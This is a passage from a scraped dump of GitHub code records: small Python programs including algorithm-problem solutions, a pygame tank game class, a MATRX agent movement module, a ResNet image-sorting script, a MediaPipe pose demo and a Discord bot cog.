buttonInsert = QtGui.QPushButton('Insert \"c\"')\n buttonInsert.clicked.connect(insertC)\n layout.addWidget(buttonInsert)\n\n buttonRemove = QtGui.QPushButton('Remove \"c\"')\n buttonRemove.clicked.connect(removeC)\n layout.addWidget(buttonRemove)\n\n w.setLayout(layout)\n w.show()\n app.exec_()\n\nif __name__ == '__main__':\n main()\n","repo_name":"finger563/editor","sub_path":"tests/comboBox2.py","file_name":"comboBox2.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37496537256","text":"#Baekjoon 2493\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\ntowers = list(map(int, input().split()))\nstack = []\nanswer = []\nfor i in range(n):\n if len(stack) == 0:\n stack.append([towers[i], i])\n answer.append(0)\n else:\n while stack:\n if stack[-1][0] < towers[i]:\n stack.pop()\n if len(stack) == 0:\n answer.append(0)\n else:\n answer.append(stack[-1][1]+1)\n break\n stack.append([towers[i], i]) \nfor num in answer:\n print(num, end=\" \")","repo_name":"meoldae/Algorithm","sub_path":"Boj/Python/탑.py","file_name":"탑.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34759645176","text":"# your imports may be different!\nfrom classes import Book, CoffeeMachine, SoccerBall, Candle, Amazon\n\namazon = Amazon()\njohn_id = amazon.create_account(\"John\")\n\ncandle_1 = Candle()\nprint(f\"Price of a candle is {candle_1.price}\")\nprint(\"\")\n\namazon.customers[john_id].deposit(candle_1.price)\ntry:\n amazon.buy_item(john_id, candle_1) # should throw a ValueError because item not in cart\nexcept ValueError:\n amazon.add_to_cart(john_id, candle_1)\n amazon.buy_item(john_id, candle_1)\n\nprint(\"*****************Part 1*****************\")\nprint(\"After buying 1 candle:\")\nprint(amazon.customers[john_id])\n\nprint(\"\")\nprint(\"*****************Part 2*****************\")\nsarah_id = amazon.create_account(\"Sarah\")\nbook_1 = Book() # 15$\nbook_2 = Book() # 15$\ncoffee_1 = CoffeeMachine() # 100$\ncoffee_2 = CoffeeMachine() # 100$\nsoccer_ball_1 = SoccerBall() # 25$\n\ntotal_price = book_1.price + book_2.price + coffee_1.price + coffee_2.price + soccer_ball_1.price\n\namazon.add_to_cart(sarah_id, book_1)\namazon.add_to_cart(sarah_id, book_2)\namazon.add_to_cart(sarah_id, coffee_1)\namazon.add_to_cart(sarah_id, coffee_2)\namazon.add_to_cart(sarah_id, soccer_ball_1)\n\namazon.show_cart(sarah_id)\n\nprint(\"\")\nprint(\"*****************Part 3*****************\")\n\ntry:\n amazon.buy_entire_cart(sarah_id) # this should throw a ValueError because not enough funds\nexcept ValueError:\n amazon.customers[sarah_id].deposit(total_price)\n amazon.buy_entire_cart(sarah_id)\n\nprint(amazon.customers[sarah_id])\n\n# THE OUTPUT OF THE ABOVE PROGRAM IS:\n\n# Price of a candle is 5\n#\n# *****************Part 1*****************\n# After buying 1 candle:\n# Name: John, Balance: 0$, Money Spent: 5$\n#\n# *****************Part 2*****************\n# Total # of items: 5\n# Total # of books: 2\n# Total # of candles: 0\n# Total # of coffee machines: 2\n# Total # of soccer balls: 1\n# Cart contents:\n# Book: 15$ -- 9d47a17c9ed64b9ea41824462368764a\n# Book: 15$ -- 7795bdfd127c49e0a36b2ca8292a0542\n# Coffee Machine: 100$ -- b531649e06a14b36b96293a9cd897ed5\n# Coffee Machine: 100$ -- e5a87b09d1794148a8a96d7fd047e6e3\n# Soccer Ball: 25$ -- f8ade4d0f8244612a9a204463294ae42\n#\n# *****************Part 3*****************\n# Name: Sarah, Balance: 25.5$, Money Spent: 229.5$\n#\n# Process finished with exit code 0\n","repo_name":"neadan/amazon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17730059480","text":"from matrxs.actions.action import Action, ActionResult\nfrom matrxs.objects.agent_body import AgentBody\n\n\n# Custom move actions that cost energy\n\ndef act_move(grid_world, agent_id, dx, dy):\n agent_avatar = grid_world.get_env_object(agent_id, obj_type=AgentBody)\n loc = agent_avatar.location\n new_loc = [loc[0] + dx, loc[1] + dy]\n grid_world.registered_agents[agent_id].location = new_loc\n\n # A move action costs energy\n custom_properties = grid_world.registered_agents[agent_id].custom_properties\n energy = custom_properties['energy']\n energy_cost_move = grid_world.environment_objects['settings'].properties['energy_cost_move']\n energy_new = energy - energy_cost_move\n custom_properties['energy'] = energy_new\n grid_world.registered_agents[agent_id].change_property('custom_properties', custom_properties)\n\n return MoveActionResult(MoveActionResult.RESULT_SUCCESS, succeeded=True)\n\n\ndef is_possible_movement(grid_world, agent_id, dx, dy):\n energy = grid_world.registered_agents[agent_id].custom_properties['energy']\n energy_cost_move = grid_world.environment_objects['settings'].properties['energy_cost_move']\n if energy > energy_cost_move:\n return possible_movement(grid_world, agent_id, dx, dy)\n else:\n return MoveActionResult(MoveActionResult.RESULT_NOT_ENOUGH_ENERGY, succeeded=False)\n\n\ndef possible_movement(grid_world, agent_id, dx, dy):\n\n agent_avatar = grid_world.get_env_object(agent_id, obj_type=AgentBody)\n assert agent_avatar is not None\n\n loc = agent_avatar.location\n new_loc = [loc[0] + dx, loc[1] + dy]\n if 0 <= new_loc[0] < grid_world.shape[0] and 0 <= new_loc[1] < grid_world.shape[1]:\n loc_obj_ids = grid_world.grid[new_loc[1], new_loc[0]]\n if loc_obj_ids is None:\n # there is nothing at that location\n return MoveActionResult(MoveActionResult.RESULT_SUCCESS, succeeded=True)\n else:\n # Go through all objects at the desired locations\n for loc_obj_id in loc_obj_ids:\n # Check if loc_obj_id is the id of an agent\n if loc_obj_id in grid_world.registered_agents.keys():\n # get the actual agent\n loc_obj = grid_world.registered_agents[loc_obj_id]\n # Check if the agent that takes the move action is not that agent at that location (meaning that\n # for some reason the move action has no effect. If this is the case, we send the apriopriate\n # result\n if loc_obj_id == agent_id:\n # The desired location contains a different agent and we cannot step at locations with agents\n return MoveActionResult(MoveActionResult.RESULT_NO_MOVE, succeeded=False)\n # Check if the agent on the other location (if not itself) is traverable. Otherwise we return that\n # the location is occupied.\n elif not loc_obj.is_traversable:\n return MoveActionResult(MoveActionResult.RESULT_OCCUPIED, succeeded=False)\n # If there are no agents at the desired location or we can move on top of other agents, we check if\n # there are objects in the way that are not passable.\n if loc_obj_id in grid_world.environment_objects.keys():\n # get the actual object\n loc_obj = grid_world.environment_objects[loc_obj_id]\n # Check if the object is not passable, if this is not the case is_traversable is False\n if not loc_obj.is_traversable:\n # The desired location contains an object that is not passable\n return MoveActionResult(MoveActionResult.RESULT_NOT_PASSABLE_OBJECT, succeeded=False)\n\n # Either the desired location contains the agent at previous tick, and/or all objects there are passable\n return MoveActionResult(MoveActionResult.RESULT_SUCCESS, succeeded=True)\n else:\n return MoveActionResult(MoveActionResult.RESULT_OUT_OF_BOUNDS, succeeded=False)\n\n\nclass MoveActionResult(ActionResult):\n RESULT_NO_MOVE = 'Move action resulted in a new location with the agent already present.'\n RESULT_SUCCESS = 'Move action success'\n RESULT_OUT_OF_BOUNDS = 'Move action out of bounds'\n RESULT_OCCUPIED = 'Move action towards occupied space'\n RESULT_NOT_PASSABLE_OBJECT = 'Move action toward space which is not traversable by agent due object'\n RESULT_NOT_ENOUGH_ENERGY = 'Not enough energy to perform move action'\n\n def __init__(self, result, succeeded):\n super().__init__(result, succeeded)\n\n\nclass Move(Action):\n def __init__(self, duration_in_ticks=0):\n super().__init__(duration_in_ticks)\n self.dx = 0\n self.dy = 0\n\n def is_possible(self, grid_world, agent_id, **kwargs):\n result = is_possible_movement(grid_world, agent_id=agent_id, dx=self.dx, dy=self.dy)\n return result\n\n def mutate(self, grid_world, agent_id, **kwargs):\n return act_move(grid_world, agent_id=agent_id, dx=self.dx, dy=self.dy)\n\n\nclass MoveNorth2(Move):\n def __init__(self):\n super().__init__()\n self.dx = 0\n self.dy = -1\n\n\nclass MoveEast2(Move):\n\n def __init__(self):\n super().__init__()\n self.dx = +1\n self.dy = 0\n\n\nclass MoveSouth2(Move):\n\n def __init__(self):\n super().__init__()\n self.dx = 0\n self.dy = +1\n\n\nclass MoveWest2(Move):\n\n def __init__(self):\n super().__init__()\n self.dx = -1\n self.dy = 0\n","repo_name":"matrx-software/USAR-Testbed-for-Human-Agent-Teaming","sub_path":"aims/move_actions_explorer.py","file_name":"move_actions_explorer.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11412933338","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.3'\n# jupytext_version: 0.8.5\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# language_info:\n# codemirror_mode:\n# name: ipython\n# version: 3\n# file_extension: .py\n# mimetype: text/x-python\n# name: python\n# nbconvert_exporter: python\n# pygments_lexer: ipython3\n# version: 3.6.7\n# ---\n\nimport pandas as pd\nimport scanpy.api as sc\nfrom anndata import AnnData\nimport os.path\nimport sys\nsys.path.append(\"lib\")\nfrom scio import check_obs, check_var\n\nDATASET = \"zheng_bileas_2017\"\nCOUNT_FILE = \"data/{}/\".format(DATASET)\nOUTPUT_DIR = \"results/data_processed/{}/\".format(DATASET)\n\nadata = sc.read_10x_mtx(COUNT_FILE, var_names=\"gene_symbols\")\n\nadata.obs = adata.obs.assign(samples = \"1\")\\\n .assign(patient = \"1\")\\\n .assign(origin = \"blood_peripheral\")\\\n .assign(replicate = \"1\")\\\n .assign(platform = \"10x_3p_v2\")\\\n .assign(tumor_type = \"PBMC\")\n\nadata.obs[\"dataset\"] = DATASET\n\ncheck_obs(adata)\ncheck_var(adata)\n\nadata.write(os.path.join(OUTPUT_DIR, \"adata.h5ad\"), compression='lzf')\n","repo_name":"grst/single_cell_data_integration","sub_path":"pipeline_stages/01_process_counts/zheng_bileas_2017.py","file_name":"zheng_bileas_2017.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9621753799","text":"# 센서\n\nn = int(input())\nk = int(input())\nsensors = list(map(int, input().split()))\nsensors.sort()\ndist = []\nfor i in range(len(sensors)-1):\n dist.append(abs(sensors[i]-sensors[i+1]))\ndist.sort()\n\nif k >= n:\n print(0)\nelse:\n for _ in range(k-1):\n dist.pop()\n print(sum(dist))","repo_name":"niinp28/algorithm","sub_path":"BOJ/BOJ2212.py","file_name":"BOJ2212.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18518401553","text":"class Solution:\n # @param A : list of integers\n # @return an integer\n def solve(self, A):\n A.sort()\n print(A)\n\n count = 0\n n = len(A)\n for i in range(n):\n if A[i] == n - i - 1:\n count += 1\n\n return count if count else -1\n\n # A.sort()\n #\n # current = counter = 0\n #\n # if A[0] == 0:\n # counter += 1\n #\n # for i in range(1, len(A)):\n # if A[i] != A[i - 1]:\n # current += 1\n #\n # if current == A[i]:\n # counter += 1\n #\n # return counter if counter else -1\n\n\nif __name__ == '__main__':\n # A = [3, 2, 1, 3]\n # A = [1, 1, 3, 3]\n # A = [2, 4, 5, 6, 7, 8]\n A = [9, 8, 4, 5, 7, 4]\n\n print(Solution().solve(A))\n","repo_name":"vinay-yadav/Introduction_To_DSA","sub_path":"4. Sorting/2. Noble Integer.py","file_name":"2. Noble Integer.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2366818329","text":"from sys import stdin as s\nfrom collections import deque\n\n#1. graph 배열에 노드가 도달할 수 있는 노드 배열로 넣어주기\n#2. 방문여부를 체크할 수 있는 visited 빈 배열과 노드마다 최소 거리를 확인 할 수 있는 go_list 배열 만들기\n#3. bfs를 사용하여 탐색하기\n#3-1. 탐색 시작 노드를 큐에 삽입하고 방문 처리\n#3-2. 큐에서 노드를 꺼낸 뒤 해당 노드의 인접 노드 중에서 방문하지 않은 노드를 모두 큐에 삽입하고 방문처리, 노드를 이동했으므로 현재 노드 값에서 1을 더해준 값을 이동한 노드에 저장함(go_list)\n#3-3. 더 이상 2번의 과정을 수행할 수 없을 때 까지 반복\ns=open(\"input.txt\",\"rt\")\n\n\ndef bfs(graph,start,visited,k):\n \n queue = deque()\n queue.append(start) #큐에 시작 값을 넣어줌\n while queue:\n v= queue.popleft()\n visited[start]=True #visited에 방문 값을 true로 바꿔줌\n for i in graph[v]: \n if not visited[i]: #만약 노드에 방문하지 않았다면\n queue.append(i) #큐에 노드를 추가하고\n visited[i]=True # 방문 true로 해준다음 \n go_list[i] = go_list[v]+1 #간선의 가중치 값을 올려줌\n\n \n\nn,m,k,x = map(int,s.readline().split()) #n : 도시, m은 간선, k:최단 거리, x : 출발도시\nlist1 =[]\ngraph=[[] for _ in range(n+1)]\nvisited = [False]*(n+1) #방문 여부를 입력해줌\ngo_list = [0 for _ in range(n+1)] # 간선의 가중치를 저장해줌 \n#도달할 수 있는 도시 입력받고 graph 배열에 1,2,3,4 차례로 넣어주기\nfor i in range(m):\n a,b=map(int,s.readline().split())\n graph[a].append(b)\n graph[a].sort()\nbfs(graph,x,visited,k)\n \n\nprint(go_list)\n \ncount=0 #카운트를 설정해서 만약 카운트 값이 k면 count를 계속 해주고 반복이 끝났을 떄 count가 0이면 -1출력\nfor i in range(1,n+1):\n if go_list[i]==k:\n print(i)\n count+=1\nif count ==0:\n print(-1) \n ","repo_name":"heekyoung2000/jungle-algorithm","sub_path":"third/BFS/18352.py","file_name":"18352.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17672531056","text":"# -*- coding: utf-8 -*-\n\nif __name__ ==\"__main__\":\n # Defining some variables\n # integers\n int_1 = 131\n int_2 = 22\n \n # floats\n float_1 = 42.1\n float_1 = .234\n \n # complex\n complex_1 = 1j\n complex_2 = 11. + 42.2j \n \n # booleans\n is_true = True\n is_false = False\n \n # Some operations\n sum_int_int = int_1 + int_2\n sum_int_float = int_1 + float_1\n \n multiply_complex_float = complex_2 * float_1\n multiply_complex_complex = complex_1 * complex_2\n complex_pow_two = complex_1 ** 2\n \n boolean_op_1 = is_true == 1\n boolean_op_2 = is_true != is_false\n boolean_op_3 = is_false == 0\n \n # printing results\n print(\"Sum, integer + integer: %i\" % sum_int_int)\n print(\"Sum, integer + float: %f is float\" % sum_int_int)\n print(\"Mul, complex * float: Real {0.real:.2f} and imag {0.imag:.2f}\".format(multiply_complex_float))\n print(\"Mul, complex * complex: Real {0.real:.2f} and imag {0.imag:.2f}\".format(multiply_complex_complex))\n print(\"Pow, complex ** 2: Real {0.real:.2f} and imag {0.imag:.2f}\".format(complex_pow_two))\n print(\"Boolean operation 1, True == 1: {0}\".format(boolean_op_1))\n print(\"Boolean operation 2, True != False: {0}\".format(boolean_op_2))\n print(\"Boolean operation 3, False == 0: {0}\".format(boolean_op_3))","repo_name":"ovainola/python_kurssi","sub_path":"esimerkit/Basics/1_numerot.py","file_name":"1_numerot.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22281932220","text":"#Class tank của máy\n\nimport pygame\nimport random\nimport Tank\nfrom pgzero.actor import Actor\nimport Explosion\n\npygame.init()\nHEIGHT, WIDTH = 600, 800\nSIZE_TANK = 25\n\nclass Tank_enemy(Tank.Tank): #kế thừa từ lớp tank gốc\n def __init__(self, image, x, y, angle): #(ảnh xe tăng, vị trí(x, y), hướng)\n super().__init__(image, x, y, angle)\n self.count = 0 #số bước đi\n self.explosion_wall_list = [] #list vụ nổ tường do xe tăng tạo ra\n \n def move(self, wall_list): #hàm di chuyển\n orginal_x, orginal_y = self.x, self.y\n self.count -= 1\n if self.angle == 0:\n self.x += 1\n elif self.angle == 90:\n self.y -= 1\n elif self.angle == 180:\n self.x -= 1\n elif self.angle == 270:\n self.y += 1\n if self.x < SIZE_TANK or self.y < SIZE_TANK or self.x > WIDTH - SIZE_TANK or self.y > HEIGHT - SIZE_TANK: #không cho xe tăng đi ra ngoài màn hình\n self.x, self.y = orginal_x, orginal_y\n self.count = 0\n if self.collidelist(wall_list) != -1: #không cho xe tăng đi xuyên tường\n self.x, self.y = orginal_x, orginal_y\n self.count = 0\n \n def set_count(self): #đặt lại số bước đi của xe\n self.count = 30\n\n def set_angle(self): #đặt lại hướng của xe\n self.angle = random.randint(0, 3) * 90\n\n def add_bullet(self, hold_off): #thêm đạn vào list đạn\n if self.hold_off == 0:\n bullet = Actor('bulletred2')\n bullet.pos = self.pos\n bullet.angle = self.angle\n if bullet.angle == 0:\n bullet.x += SIZE_TANK\n elif bullet.angle == 90:\n bullet.y -= SIZE_TANK\n elif bullet.angle == 180:\n bullet.x -= SIZE_TANK\n elif bullet.angle == 270:\n bullet.y += SIZE_TANK\n self.bullet_list.append(bullet)\n self.hold_off = max(10, 30 - hold_off) #để giúp trong chế độ bắn theo level nạp đạn nhanh chậm\n else:\n self.hold_off -= 1\n\n def bullet_wall(self, wall_list): #check xem có bắn vào tường không\n for bullet in self.bullet_list:\n wall_index = bullet.collidelist(wall_list) \n if wall_index != -1:\n #nổ tường\n self.explosion_wall_list.append(Explosion.Explosion('images/explosion4.png', \n (wall_list[wall_index].x - SIZE_TANK, wall_list[wall_index].y - SIZE_TANK)))\n wall_list.pop(wall_index)\n pygame.mixer.Sound('sounds/gun10.wav').play()\n self.bullet_list.remove(bullet)\n\n def bullet_tank(self, tank, status): #check xem máy có bắn trúng xe tăng mình không\n for bullet in self.bullet_list:\n if bullet.colliderect(tank): \n status.loss = True \n pygame.mixer.Sound('sounds/gun10.wav').play()\n\n def upd(self, wall_list, tank, speed, hold_off, status): #hàm update\n choice = random.randint(0, 2)\n if self.count > 0: #di chuyển\n self.move(wall_list)\n elif choice == 0: #đặt lại số bước đi\n self.set_count()\n elif choice == 1: #đặt lại hướng\n self.set_angle()\n elif choice == 2: #thêm đạn vào list\n self.add_bullet(hold_off)\n super().set_bullet(speed) #bắn đạn\n self.bullet_tank(tank, status) #máy bắn trúng người\n self.bullet_wall(wall_list) #máy bắn trúng tường\n\n def draw(self):\n super().draw()","repo_name":"NNovember-rain/TANK_PYTHON","sub_path":"Tank_enemy.py","file_name":"Tank_enemy.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27291338816","text":"# 학생들의 번호는 체격 순으로 매겨져 있어, 바로 앞번호의 학생이나 바로 뒷번호의 학생에��만 체육복을 빌려줄 수 있습니다.\n\n# 전체 학생의 수 n, 체육복을 도난당한 학생들의 번호가 담긴 배열 lost, 여벌의 체육복을 가져온 학생들의 번호가 담긴 배열 reserve가 매개변수로 주어질 때, 체육수업을 들을 수 있는 학생의 최댓값을 return 하도록 solution 함수를 작성해주세요.\n\n# 여벌 체육복을 가져온 학생이 체육복을 도난당했을 수 있습니다. => lost와 reserve에 같은 값이 있다면, reserve와 lost에서 제외.\n\ndef solution(n, lost, reserve):\n \n # 여벌 체육복을 가져온 학생이 체육복을 도난당했을 수 있습니다.\n # 차집합 연산으로 제외\n reserve_set = set(reserve) - set(lost)\n lost_set = set(lost) - set(reserve)\n \n for i in reserve_set:\n if i-1 in lost_set:\n lost_set.remove(i-1)\n elif i+1 in lost_set:\n lost_set.remove(i+1)\n \n answer = n - len(lost_set)\n \n return answer","repo_name":"jeongjae96/Coding_Test_Preparation","sub_path":"Programmers/코딩테스트 고득점 Kit/level 1/탐욕법/체육복.py","file_name":"체육복.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7021753042","text":"incorr_list = []\ndictionary = ['all', 'an', 'and', 'as', 'closely', 'correct', 'equivocal', 'examine', 'indication', 'is', 'means', 'minutely', 'or', 'scrutinize', 'sign', 'the', 'to', 'uncertain']\n\nsent = input()\nsent = sent.split()\n\nfor word in sent:\n if word not in dictionary:\n incorr_list.append(word)\n\nif len(incorr_list) == 0:\n print(\"OK\")\nelse:\n print(\"\\n\".join(incorr_list))\n","repo_name":"javampishu/TicTacToe","sub_path":"Problems/Spellchecker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70725505653","text":"from aiogram import types\nfrom aiogram.filters import BaseFilter, IS_ADMIN\n\n\nclass IsAdminFilter(BaseFilter):\n key = \"is_admin\"\n\n def __init__(self, is_admin: bool):\n self.is_admin = is_admin\n\n async def __call__(self, message: types.Message):\n member = await message.bot.get_chat_member(message.chat.id, message.from_user.id)\n return IS_ADMIN.check(member=member)\n\n\n","repo_name":"mrFrok/Bot_Glavkom_Gestapo","sub_path":"filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30491725970","text":"import os\nimport json\n\nimport torch\nimport torch.nn as nn\nfrom PIL import Image\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\n\nfrom resnet import resnet34\n\n# 选择你想要找的类别\nclass_name = 'cat'\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# transform方法\ndata_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n# 从json中读入标签索引字典\njson_path = './class_indices.json'\nassert os.path.exists(json_path), \"file: '{}' dose not exist.\".format(json_path)\nwith open(json_path, \"r\") as f:\n class_indict = json.load(f)\n\n# 待测图片文件夹\ntest_img_path = '../data/processed_data/test'\n# 该文件夹存放找到的图片\npick_out_path = './{}_pictures_you_want'.format(class_name)\nif not os.path.exists(pick_out_path):\n os.mkdir(pick_out_path)\n\n# 开始寻找图片\nfind_num = 0\ntest_imglist = os.listdir(test_img_path)\nfor index in range(len(test_imglist)):\n img1 = Image.open(os.path.join(test_img_path, test_imglist[index]))\n # [N, C, H, W]\n img = data_transform(img1)\n # 增加一个batch维度\n img = torch.unsqueeze(img, dim=0)\n\n # 选择模型\n net = resnet34()\n in_channel = net.fc.in_features\n net.fc = nn.Sequential(\n nn.Linear(in_channel, 100, bias=True),\n nn.ReLU(),\n nn.Linear(100, 20, bias=True),\n )\n net.to(device)\n # 载入训练好的模型权重\n weights_path = \"./best_resNet34.pth\"\n assert os.path.exists(weights_path), \"file: '{}' dose not exist.\".format(weights_path)\n net.load_state_dict(torch.load(weights_path, map_location=device))\n\n # 预测图片\n net.eval()\n with torch.no_grad():\n output = torch.squeeze(net(img.to(device))).cpu()\n predict = torch.softmax(output, dim=0)\n predict_cla = torch.argmax(predict).numpy()\n\n\n # 显示该图片\n plt.ion()\n plt.imshow(img1)\n print_res = \"class: {} prob: {:.3}\".format(class_indict[str(predict_cla)],\n predict[predict_cla].numpy())\n plt.title(print_res)\n plt.pause(1)\n plt.close()\n\n # 显示图片名称\n print('\\n----------------------------------'\n '\\n{}/{}'\n '\\n{}'.format(index, len(test_imglist), test_imglist[index]))\n\n # 显示各类别预测概率,并由大到小排序\n predict_list = []\n for i in range(len(predict)):\n print(\"class: {:10} prob: {:.3}\".format(class_indict[str(i)],\n predict[i].numpy()))\n predict_list.append(predict[i].numpy())\n predict_list.sort()\n predict_list.reverse()\n # 如果预测类别与规定类别一致,并且预测概率大于第二大概率的1.5倍,保存该图片到指定文件夹\n if class_indict[str(predict_cla)] == class_name and predict_list[0] > 1.5*predict_list[1]:\n find_num = find_num + 1\n img1.save(os.path.join(pick_out_path, test_imglist[index]))\n print('\\nHave save image:{} to {}' .format(test_imglist[index], pick_out_path))\n print('have found {} pictures' .format(find_num))\n if index == len(test_imglist) - 1:\n print('Finish search!')\n","repo_name":"Mingrui-Huang/datamining","sub_path":"课程作业/大作业/代码/voc2012_resnet/images_mining.py","file_name":"images_mining.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33846088717","text":"class Solution(object):\n def networkDelayTime(self, times, N, K):\n \"\"\"\n :type times: List[List[int]]\n :type N: int\n :type K: int\n :rtype: int\n \"\"\"\n from collections import defaultdict\n graph = defaultdict(list)\n for u, v, w in times:\n graph[u].append((w, v))\n\n dist = [float(\"inf\")] * (N + 1)\n\n def dfs(node, elapsed):\n if elapsed >= dist[node]:\n return\n dist[node] = elapsed\n for time, nei in sorted(graph[node]):\n dfs(nei, elapsed + time)\n\n dfs(K, 0)\n res = max(dist[1:])\n\n if res < float(\"inf\"):\n return res\n return -1\n\n\nif __name__ == \"__main__\":\n # times = [[3, 5, 78], [2, 1, 1], [1, 3, 0], [4, 3, 59], [5, 3, 85], [5, 2, 22], [2, 4, 23], [1, 4, 43], [4, 5, 75],\n # [5, 1, 15], [1, 5, 91], [4, 1, 16], [3, 2, 98], [3, 4, 22], [5, 4, 31], [1, 2, 0], [2, 5, 4], [4, 2, 51],\n # [3, 1, 36], [2, 3, 59]]\n # N = 5\n # K = 5\n\n times = [[2, 1, 1], [2, 3, 1], [3, 4, 1]]\n N = 4\n K = 2\n print(Solution().networkDelayTime(times, N, K))\n","repo_name":"simplynaive/LeetCode","sub_path":"743. Network Delay Time.py","file_name":"743. Network Delay Time.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39066638967","text":"# Script for applying media pipe in videos\n\nfrom mediapipe import solutions\nfrom mediapipe.framework.formats import landmark_pb2\nimport mediapipe as mp\nfrom mediapipe.tasks import python\nfrom mediapipe.tasks.python import vision\n\nimport numpy as np\nimport cv2\n\ndef draw_landmarks_on_image(rgb_image, detection_result):\n pose_landmarks_list = detection_result.pose_landmarks\n annotated_image = np.copy(rgb_image)\n \n # Loop through the detected poses to visualize.\n for idx in range(len(pose_landmarks_list)):\n pose_landmarks = pose_landmarks_list[idx]\n\n # Draw the pose landmarks.\n pose_landmarks_proto = landmark_pb2.NormalizedLandmarkList()\n pose_landmarks_proto.landmark.extend([\n landmark_pb2.NormalizedLandmark(x=landmark.x, y=landmark.y, z=landmark.z) for landmark in pose_landmarks\n ])\n solutions.drawing_utils.draw_landmarks(\n annotated_image,\n pose_landmarks_proto,\n solutions.pose.POSE_CONNECTIONS,\n solutions.drawing_styles.get_default_pose_landmarks_style())\n return annotated_image\n\nif __name__ == '__main__':\n \n # Configure model\n base_options = python.BaseOptions(model_asset_path='../../models/pose_landmarker_heavy.task')\n options = vision.PoseLandmarkerOptions(base_options=base_options,output_segmentation_masks=True)\n detector = vision.PoseLandmarker.create_from_options(options)\n\n # Open Video capture\n cap = cv2.VideoCapture(0)\n\n while cap.isOpened():\n ret, img = cap.read()\n\n #image = mp.Image.create_from_file(\"../data/image.jpg\")\n #mp_image = mp.Image(image_format=mp.ImageFormat.SRGB, data=img)\n #detection_result = detector.detect(mp_image)\n #annotated_image = draw_landmarks_on_image(mp_image.numpy_view(), detection_result)\n \n #cv2.imshow(\"resultado\",annotated_image)\n cv2.imshow(\"imagen\", img)\n k = cv2.waitKey(25)\n if (k & 0xFF)==ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()","repo_name":"AlejandroMaldoRam/mediapipe-test","sub_path":"scripts/pose-detection/test-mediapipe-video.py","file_name":"test-mediapipe-video.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70439520373","text":"import json,sys\r\ndef get_date(time):\r\n with open('record.json','r',newline='') as f:\r\n data = json.load(f)\r\n cnt = 0\r\n try:\r\n for i in data[time]:\r\n if(data[time][i] == True):\r\n cnt += 1\r\n print(cnt)\r\n except:\r\n print(0)\r\n\r\nif __name__ == \"__main__\":\r\n time = sys.argv[1]\r\n get_date(time)","repo_name":"Koios1143/TFCIS_order_system","sub_path":"attach_data.py","file_name":"attach_data.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4848195469","text":"import datetime\n\nfrom hypixel.utils.functions import *\n\n\nclass CrazyWalls(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.utils = utils(self.bot)\n\n @commands.command(hidden=True, enabled=False)\n async def HiddenCrazyWalls(self, ctx, user):\n start = datetime.datetime.now()\n player = await self.utils.findUser(ctx, user)\n if type(player) != Player: return\n playerJSON = player.JSON\n if \"stats\" not in playerJSON or \"TrueCombat\" not in playerJSON[\"stats\"] or len(playerJSON['stats']['TrueCombat']) < 5: return await ctx.send(f\"Doesn't look like `{player.getName()}` has played Crazy Walls before.\")\n embeds = self.CrazyWalls(player)\n time_taken = datetime.datetime.now() - start\n logging.info(f'{ctx.message.content} - {time_taken.total_seconds()}s [{ctx.message.author.id}]')\n await self.utils.send(ctx, embeds = embeds)\n await self.utils._discord_account(ctx, playerJSON, player.getRank()[\"rank\"])\n\n def CrazyWalls(self, player):\n playerJSON = player.JSON\n playerRank = player.getRank()\n playerName = player.getName()\n playerSession = player.getSession()\n onlineStatus = player.getOnlineStatus()\n playerTC = playerJSON[\"stats\"][\"TrueCombat\"]\n if 